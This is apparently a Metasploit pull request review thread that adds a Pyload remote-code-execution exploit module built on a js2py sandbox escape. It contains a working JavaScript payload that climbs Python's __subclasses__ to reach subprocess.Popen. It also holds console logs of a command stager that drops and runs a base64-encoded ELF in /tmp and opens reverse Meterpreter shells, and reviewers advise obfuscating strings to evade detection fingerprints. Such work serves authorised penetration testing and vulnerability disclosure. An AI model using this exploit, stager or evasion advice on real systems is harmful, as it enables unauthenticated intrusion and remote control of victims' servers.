Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)
rapid7/metasploit-framework pull request #19640
Opened 2024-11-13 00:10 UTC by jheysel-r7

This add an exploit module for an RCE vulnerability in Pyload. 

CVE-2024-28397 is sandbox escape in js2py (<=0.74) which is a popular python package that can evaluate
javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference
to a python object in the js2py environment enabling them to escape the sandbox, bypass pyimport restrictions
and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
is the latest version of js2py which was released Nov 6, 2022.

CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
can bypass this restriction in order to access the API to achieve unauth RCE.
## Verification

List the steps needed to make sure this thing works

1. Start a vulnerable instance of pyLoad using docker
2. Start msfconsole
3. Run: `use exploit/linux/http/pyload_js2py_cve_2024_39205`
4. Set the `RHOST`, `LHOST` `PAYLOAD` and payload associated options
5. Run: `run`

2024-11-13 13:29 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      hash[key] = Rex::Text.rand_text_alpha(8..16)
Could we use the Rex::RandomIdentifier here 🤞 

i.e. for java it's: `Rex::RandomIdentifier::Generator.new({ language: :java })`

I believe it doesn't currently support javascript so you'll have to throw up a PR to that repo with the reserved keywords that aren't allowed to be generated - such as `let` `var` `class` etc :+1:

2024-11-13 16:41 UTC, jheysel-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
I'll be honest this was copied from a module that predated fetch payloads. I thought I'd leave in support for the command stager target so there was more than one target although I guess it could be removed.

2024-11-13 16:44 UTC, jheysel-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      hash[key] = Rex::Text.rand_text_alpha(8..16)
Great idea thanks for the suggestion. I've put up a PR here: https://github.com/rapid7/rex-random_identifier/pull/12/files and tested the changes.

I've also added the blocked label to this PR, just to be safe, as the above will have to be landed first.

2024-11-13 22:31 UTC, smcintyre-r7 requested changes
Module is looking pretty good. I was able to test that it's working just fine so I'll land the rex-random_identifier side of things. I just left a couple of comments, one of which is an issue with payload encoding/escaping.

I tested the version mentioned in the docs, but I also spot checked a couple older versions; `version-0.5.0b3.dev79` and `version-0.5.0b3.dev73`. The last one, dev73, was posted over a year ago.

<details>
<summary>Testing Output</summary>
First is targeting dev79 then behind the scenes I switched to dev 73. Both worked as intended.
```
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCon4BRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/EmtlY.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/gplfg' < '/tmp/EmtlY.b64' ; chmod +x '/tmp/gplfg' ; '/tmp/gplfg' ; rm -f '/tmp/gplfg' ; rm -f '/tmp/EmtlY.b64'"]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCon4BRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/EmtlY.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/gplfg' < '/tmp/EmtlY.b64' ; chmod +x '/tmp/gplfg' ; '/tmp/gplfg' ; rm -f '/tmp/gplfg' ; rm -f '/tmp/EmtlY.b64'
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:48736) at 2024-11-13 17:22:00 -0500
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > 
[*] 192.168.159.128 - Meterpreter session 3 closed.  Reason: Died

metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > check

[*] Executing command: sleep 9
[*] Elapsed time: 9.956202448000113 seconds
[+] 192.168.159.128:9666 - The target is vulnerable. Successfully tested command injection.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCon4BRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/JoQxC.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/FudcN' < '/tmp/JoQxC.b64' ; chmod +x '/tmp/FudcN' ; '/tmp/FudcN' ; rm -f '/tmp/FudcN' ; rm -f '/tmp/JoQxC.b64'"]
[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCon4BRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/JoQxC.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/FudcN' < '/tmp/JoQxC.b64' ; chmod +x '/tmp/FudcN' ; '/tmp/FudcN' ; rm -f '/tmp/FudcN' ; rm -f '/tmp/JoQxC.b64'
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.128:44282) at 2024-11-13 17:28:38 -0500


[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > 
meterpreter > 
meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : 192.168.250.134
OS           :  (Linux 6.11.5-200.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/config/data
meterpreter > 
```
</details>

2024-11-13 22:31 UTC, smcintyre-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +    print_status(javascript_payload(cmd))
This looks like it was left over from debugging. I'd either remove it or print something about what's being shown to the user, so they know what they're looking at.

2024-11-13 22:31 UTC, smcintyre-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      let #{js_vars[:command]} = "#{cmd}"
I don't see anything that is ensuring this string does not contain a `"` or `\` which would break the payload. Since you're using the command stager mixin, you can't use the bad characters in the payload definition so you'd need to either encode or escape them yourself.

```
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > set CMD echo \"Hello World\" > /tmp/test
CMD => echo "Hello World" > /tmp/test
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > run

[+] echo "Hello World" > /tmp/test
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: echo "Hello World" > /tmp/test
[*] let sIpIgn0gLp = "echo "Hello World" > /tmp/test"
let ssECweziZ_x, j0ehclY, jLJq63MDxGl
let tOQkGEdUsBo1, fIix

ssECweziZ_x = Object.getOwnPropertyNames({})
j0ehclY = ssECweziZ_x.__getattribute__
jLJq63MDxGl = j0ehclY("__getattribute__")
fIix = jLJq63MDxGl("__class__").__base__
tOQkGEdUsBo1 = fIix.__getattribute__

function tFvpKV44Ux(o) {
    let uNu0;
    for(let i in o.__subclasses__()) {
        let hAFyGH = o.__subclasses__()[i]
        if(hAFyGH.__module__ == "subprocess" && hAFyGH.__name__ == "Popen") {
            return hAFyGH
        }
        if(hAFyGH.__name__ != "type" && (uNu0 = tFvpKV44Ux(hAFyGH))) {
            return uNu0
        }
    }
}

jLJq63MDxGl = tFvpKV44Ux(fIix)(sIpIgn0gLp, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(jLJq63MDxGl)
function f() {
    return jLJq63MDxGl
}

[-] Exploit aborted due to failure: unexpected-reply: The HTTP server replied with a status of 500
[*] Exploit completed, but no session was created.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > 
```

2024-11-13 23:55 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +          for(let i in o.__subclasses__()) {
I believe `i` can be randomized, as well as `o`, and later `f`

2024-11-13 23:56 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      console.log(#{js_vars[:n11]})
is this debugging code that can be removed now? 👀

2024-11-13 23:56 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      }
Just wanted to confirm if this is needed 👀

2024-11-14 01:22 UTC, jheysel-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      }
Both of these can be removed:
```
      console.log(#{js_vars[:n11]})
      function f() {
          return #{js_vars[:n11]}
      }
```

The body of the 500 response changes from just `Could not decrypt key` to the error that was getting logged to the console which is a larger html page which includes: `<title>Sorry, something went wrong... :(</title>`.

 I'll make the necessary change to the check at the bottom of `execute_command` to account for this.

2024-11-14 01:22 UTC, jheysel-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      let #{js_vars[:command]} = "#{cmd}"
I've add the following:
```
    cmd.gsub!(/\\/, '\\\\\\\\')
    cmd.gsub!(/"/, '\"')
```
Please let me know if you think the forward slash is being escaped properly.

This allows us to:
```
set cmd 'echo "Hello\\\\ World" > /tmp/test'
```
Which results in the following on the target:
```
root@5f49245fb183:/tmp# cat test
Hello\\ World
```

2024-11-14 15:27 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +          for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
It's cool that we're obfuscating the variable names - but if I were writing fingerprints for this - I'd just have a simple check for `__subclasses__` to detect issues

Maybe this should be obfuscated too?

2024-11-14 15:27 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +          for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
I don't know if our `:Rex::Exploitation::ObfuscateJS` handles this or not

2024-11-14 15:30 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +          for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
Might have to swap out things like `let` for `var` for it to work, as I'm not sure how much modern syntax it supports

2024-11-14 18:32 UTC, smcintyre-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +      let #{js_vars[:command]} = "#{cmd}"
Looks good now, thanks for fixing this! I tested a few things and confirmed through a bash shell on the container that they all worked as intended.

```
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > set CMD "echo 'Spencer says \"Hello World\", C:\\ Drive is Best Drive' > /tmp/message"
CMD => echo 'Spencer says "Hello World", C:\ Drive is Best Drive' > /tmp/message
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) > run

[+] echo 'Spencer says "Hello World", C:\ Drive is Best Drive' > /tmp/message
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing command: sleep 5
[*] Elapsed time: 5.741484981001122 seconds
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: echo 'Spencer says \"Hello World\", C:\\ Drive is Best Drive' > /tmp/message
[*] Exploit completed, but no session was created.
metasploit-framework.pr (S:0 J:0) exploit(linux/http/pyload_js2py_cve_2024_39205) >
```

2024-11-15 14:24 UTC, smcintyre-r7 approved these changes

2024-11-15 14:24 UTC, merged

2024-11-15 14:25 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit module that leverages CVE-2024-39205 which is an unauthenticated RCE in Pyload.

2024-11-15 15:37 UTC, adfoster-r7 commented on modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb
> +          for(let #{js_vars[:i]} in #{js_vars[:o]}.__subclasses__()) {
Not a blocker; Just a bit of final golfing 🏌️ 

Since you can access object attributes with two notations `object.attribute` or `object['attribute']`. I believe if you swap to the latter syntax of `__module__` or `__name__` the full payload would be obfuscated fully without any strings that would be easy to match